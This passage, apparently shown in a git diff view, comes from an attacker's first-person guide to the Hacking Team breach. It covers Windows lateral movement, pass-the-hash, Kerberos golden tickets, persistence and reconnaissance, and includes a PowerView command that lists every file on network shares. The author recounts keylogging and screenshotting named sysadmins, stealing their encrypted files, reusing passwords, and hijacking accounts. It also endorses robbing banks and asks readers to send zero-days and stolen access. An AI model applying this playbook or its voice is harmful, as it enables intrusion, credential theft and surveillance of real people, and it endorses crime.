and sekurlsa::msv, on the computers where you already have admin access. The
|
||||
techniques for "in place" movement also require administrative privileges
|
||||
(except for runas). The most important tools for privilege escalation are
|
||||
PowerUp [2], and bypassuac [3].
|
||||
|
||||
[1] https://adsecurity.org/?page_id=1821
|
||||
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
|
||||
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
|
||||
|
||||
|
||||
Remote Movement:
|
||||
|
||||
1) psexec
|
||||
|
||||
The tried and true method for lateral movement on windows. You can use
|
||||
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
|
||||
invoke_psexec [4], or the builtin windows command "sc" [5]. For the
|
||||
metasploit module, powershell empire, and pth-winexe [6], you just need the
|
||||
hash, not the password. It's the most universal method (it works on any
|
||||
windows computer with port 445 open), but it's also the least stealthy.
|
||||
Event type 7045 "Service Control Manager" will appear in the event logs. In
|
||||
my experience, no one has ever noticed during a hack, but it helps the
|
||||
investigators piece together what the hacker did afterwards.
|
||||
|
||||
2) WMI
|
||||
|
||||
The most stealthy method. The WMI service is enabled on all windows
|
||||
computers, but except for servers, the firewall blocks it by default. You
|
||||
can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
|
||||
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
|
||||
wmic [5]. All except wmic just need the hash.
|
||||
|
||||
3) PSRemoting [10]
|
||||
|
||||
It's disabled by default, and I don't recommend enabling new protocols.
|
||||
But, if the sysadmin has already enabled it, it's very convenient,
|
||||
especially if you use powershell for everything (and you should use
|
||||
powershell for almost everything, it will change [11] with powershell 5 and
|
||||
windows 10, but for now powershell makes it easy to do everything in RAM,
|
||||
avoid AV, and leave a small footprint)
|
||||
|
||||
4) Scheduled Tasks
|
||||
|
||||
You can execute remote programs with at and schtasks [5]. It works in the
|
||||
same situations where you could use psexec, and it also leaves a well known
|
||||
footprint [12].
|
||||
|
||||
5) GPO
|
||||
|
||||
If all those protocols are disabled or blocked by the firewall, once you're
|
||||
Domain Admin, you can use GPO to give users a login script, install an msi,
|
||||
execute a scheduled task [13], or, like we'll see with the computer of
|
||||
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
|
||||
open the firewall.
|
||||
|
||||
[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
|
||||
[2] https://sourceforge.net/projects/winexe/
|
||||
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
|
||||
[4] http://www.powershellempire.com/?page_id=523
|
||||
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
|
||||
[6] https://github.com/byt3bl33d3r/pth-toolkit
|
||||
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
|
||||
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
|
||||
[9] http://www.powershellempire.com/?page_id=124
|
||||
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
|
||||
[11] https://adsecurity.org/?p=2277
|
||||
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
|
||||
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
|
||||
|
||||
|
||||
"In place" Movement:
|
||||
|
||||
1) Token Stealing
|
||||
|
||||
Once you have admin access on a computer, you can use the tokens of the
|
||||
other users to access resources in the domain. Two tools for doing this are
|
||||
incognito [1] and the mimikatz token::* commands [2].
|
||||
|
||||
2) MS14-068
|
||||
|
||||
You can take advantage of a validation bug in Kerberos to generate Domain
|
||||
Admin tickets [3][4][5].
|
||||
|
||||
3) Pass the Hash
|
||||
|
||||
If you have a user's hash, but they're not logged in, you can use
|
||||
sekurlsa::pth [2] to get a ticket for the user.
|
||||
|
||||
4) Process Injection
|
||||
|
||||
Any RAT can inject itself into other processes. For example, the migrate
|
||||
command in meterpreter and pupy [6], or the psinject [7] command in
|
||||
powershell empire. You can inject into the process that has the token you
|
||||
want.
|
||||
|
||||
5) runas
|
||||
|
||||
This is sometimes very useful since it doesn't require admin privileges.
|
||||
The command is part of windows, but if you don't have a GUI you can use
|
||||
powershell [8].
|
||||
|
||||
[1] https://www.indetectables.net/viewtopic.php?p=211165
|
||||
[2] https://adsecurity.org/?page_id=1821
|
||||
[3] https://github.com/bidord/pykek
|
||||
[4] https://adsecurity.org/?p=676
|
||||
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
|
||||
[6] https://github.com/n1nj4sec/pupy
|
||||
[7] http://www.powershellempire.com/?page_id=273
|
||||
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
|
||||
|
||||
|
||||
----[ 13.2 - Persistence ]------------------------------------------------------
|
||||
|
||||
Once you have access, you want to keep it. Really, persistence is only a
|
||||
challenge for assholes like Hacking Team who target activists and other
|
||||
individuals. To hack companies, persistence isn't needed since companies never
|
||||
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
|
||||
high-uptime servers. On the off chance that they all reboot at the same time,
|
||||
I have passwords and a golden ticket [1] as backup access. You can read more
|
||||
about the different techniques for persistence in windows here [2][3][4]. But
|
||||
for hacking companies, it's not needed and it increases the risk of detection.
|
||||
|
||||
[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
|
||||
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
|
||||
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
|
||||
[4] https://blog.netspi.com/tag/persistence/
|
||||
|
||||
|
||||
----[ 13.3 - Internal reconnaissance ]------------------------------------------
|
||||
|
||||
The best tool these days for understanding windows networks is Powerview [1].
|
||||
It's worth reading everything written by it's author [2], especially [3], [4],
|
||||
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
|
||||
many windows 2000 and 2003 servers without powershell, you also have to learn
|
||||
the old school [8], with programs like netview.exe [9] or the windows builtin
|
||||
"net view". Other techniques that I like are:
|
||||
|
||||
1) Downloading a list of file names
|
||||
|
||||
With a Domain Admin account, you can download a list of all filenames in
|
||||
the network with powerview:
|
||||
|
||||
Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
|
||||
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
|
||||
select fullname | out-file -append files.txt}
|
||||
|
||||
Later, you can read it at your leisure and choose which files to download.
|
||||
|
||||
2) Reading email
|
||||
|
||||
As we've already seen, you can download email with powershell, and it has a
|
||||
lot of useful information.
|
||||
|
||||
3) Reading sharepoint
|
||||
|
||||
It's another place where many businesses store a lot of important
|
||||
information. It can also be downloaded with powershell [10].
|
||||
|
||||
4) Active Directory [11]
|
||||
|
||||
It has a lot of useful information about users and computers. Without being
|
||||
Domain Admin, you can already get a lot of info with powerview and other
|
||||
tools [12]. After getting Domain Admin, you should export all the AD
|
||||
information with csvde or another tool.
|
||||
|
||||
5) Spy on the employees
|
||||
|
||||
One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
|
||||
(one of Hacking Team's sysadmins) gave me access to a Nagios server which
|
||||
gave me access to the rete sviluppo (development network with the source
|
||||
code of RCS). With a simple combination of Get-Keystrokes and
|
||||
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
|
||||
[14], and GPO, you can spy on any employee, or even on the whole domain.
|
||||
|
||||
[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
|
||||
[2] http://www.harmj0y.net/blog/tag/powerview/
|
||||
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
|
||||
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
|
||||
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
|
||||
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
|
||||
[7] https://adsecurity.org/?p=2535
|
||||
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
|
||||
[9] https://github.com/mubix/netview
|
||||
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
|
||||
[11] https://adsecurity.org/?page_id=41
|
||||
[12] http://www.darkoperator.com/?tag=Active+Directory
|
||||
[13] https://github.com/PowerShellMafia/PowerSploit
|
||||
[14] https://github.com/samratashok/nishang
|
||||
|
||||
|
||||
--[ 14 - Hunting Sysadmins ]----------------------------------------------------
|
||||
|
||||
Reading their documentation about their infrastructure [1], I saw that I was
|
||||
still missing access to something important - the "Rete Sviluppo", an isolated
|
||||
network with the source code for RCS. The sysadmins of a company always have
|
||||
access to everything, so I searched the computers of Mauro Romeo and Christian
|
||||
Pozzi to see how they administer the Sviluppo network, and to see if there
|
||||
were any other interesting systems I should investigate. It was simple to
|
||||
access their computers, since they were part of the windows domain where I'd
|
||||
already gotten admin access. Mauro Romeo's computer didn't have any ports
|
||||
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
|
||||
addition to keylogging and screen scraping with Get-Keystrokes and
|
||||
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
|
||||
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
|
||||
Truecrypt volume, I waited until he'd mounted it and then copied off the
|
||||
files. Many have made fun of Christian Pozzi's weak passwords (and of
|
||||
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
|
||||
included them in the leak as a false clue, and to laugh at him. The reality is
|
||||
that mimikatz and keyloggers view all passwords equally.
|
||||
|
||||
[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
|
||||
[2] http://www.hammer-software.com/wmigphowto.shtml
|
||||
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
|
||||
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
|
||||
[5] http://pwnwiki.io/#!presence/windows/find_files.md
|
||||
[6] http://archive.is/TbaPy
|
||||
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
|
||||
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
|
||||
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/
|
||||
|
||||
|
||||
--[ 15 - The bridge ]-----------------------------------------------------------
|
||||
|
||||
Within Christian Pozzi's Truecrypt volume, there was a textfile with many
|
||||
passwords [1]. One of those was for a Fully Automated Nagios server, which had
|
||||
access to the Sviluppo network in order to monitor it. I'd found the bridge I
|
||||
needed. The textfile just had the password to the web interface, but there was
|
||||
a public code execution exploit [2] (it's an unauthenticated exploit, but it
|
||||
requires that at least one user has a session initiated, for which I used the
|
||||
password from the textfile).
|
||||
|
||||
[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
|
||||
[2] http://seclists.org/fulldisclosure/2014/Oct/78
|
||||
|
||||
|
||||
--[ 16 - Reusing and resetting passwords ]--------------------------------------
|
||||
|
||||
Reading the emails, I'd seen Daniele Milan granting access to git repos. I
|
||||
already had his windows password thanks to mimikatz. I tried it on the git
|
||||
server and it worked. Then I tried sudo and it worked. For the gitlab server
|
||||
and their twitter account, I used the "forgot my password" function along with
|
||||
my access to their mail server to reset the passwords.
|
||||
|
||||
|
||||
--[ 17 - Conclusion ]-----------------------------------------------------------
|
||||
|
||||
That's all it takes to take down a company and stop their human rights abuses.
|
||||
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
|
||||
can undo years of work by a multi-million dollar company. Hacking gives the
|
||||
underdog a chance to fight and win.
|
||||
|
||||
Hacking guides often end with a disclaimer: this information is for
|
||||
educational purposes only, be an ethical hacker, don't attack systems you
|
||||
don't have permission to, etc. I'll say the same, but with a more rebellious
|
||||
conception of "ethical" hacking. Leaking documents, expropriating money from
|
||||
banks, and working to secure the computers of ordinary people is ethical
|
||||
hacking. However, most people that call themselves "ethical hackers" just work
|
||||
to secure those who pay their high consulting fees, who are often those most
|
||||
deserving to be hacked.
|
||||
|
||||
Hacking Team saw themselves as part of a long line of inspired Italian design
|
||||
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
|
||||
and government, as part of a long tradition of Italian fascism. I'd like to
|
||||
dedicate this guide to the victims of the raid on the Armando Diaz school, and
|
||||
to all those who have had their blood spilled by Italian fascists.
|
||||
|
||||
[1] https://twitter.com/coracurrier/status/618104723263090688
|
||||
|
||||
|
||||
--[ 18 - Contact ]--------------------------------------------------------------
|
||||
|
||||
To send me spear phishing attempts, death threats in Italian [1][2], and to
|
||||
give me 0days or access inside banks, corporations, governments, etc.
|
||||
|
||||
[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
|
||||
[2] https://twitter.com/CthulhuSec/status/619459002854977537
|
||||
|
||||
only encrypted email please:
|
||||
https://securityinabox.org/es/thunderbird_usarenigmail
|
||||
-----BEGIN PGP PUBLIC KEY BLOCK-----
|
||||
|
||||
mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
|
||||
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
|
||||
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
|
||||
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
|
||||
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
|
||||
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
|
||||
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
|
||||
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
|
||||
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
|
||||
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
|
||||
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
|
||||
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
|
||||
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
|
||||
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
|
||||
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
|
||||
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
|
||||
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
|
||||
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
|
||||
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
|
||||
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
|
||||
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
|
||||
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
|
||||
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
|
||||
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
|
||||
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
|
||||
=E5+y
|
||||
-----END PGP PUBLIC KEY BLOCK-----
|
||||
|
||||
|
||||
|
||||
If not you, who? If not now, when?
|
||||
_ _ _ ____ _ _
|
||||
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
|
||||
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
|
||||
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|
||||
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
|
4975
owned and exposed/2.txt
Normal file
4975
owned and exposed/2.txt
Normal file
File diff suppressed because it is too large
Load diff
13117
owned and exposed/3.txt
Normal file
13117
owned and exposed/3.txt
Normal file
File diff suppressed because it is too large
Load diff
Loading…
Add table
Reference in a new issue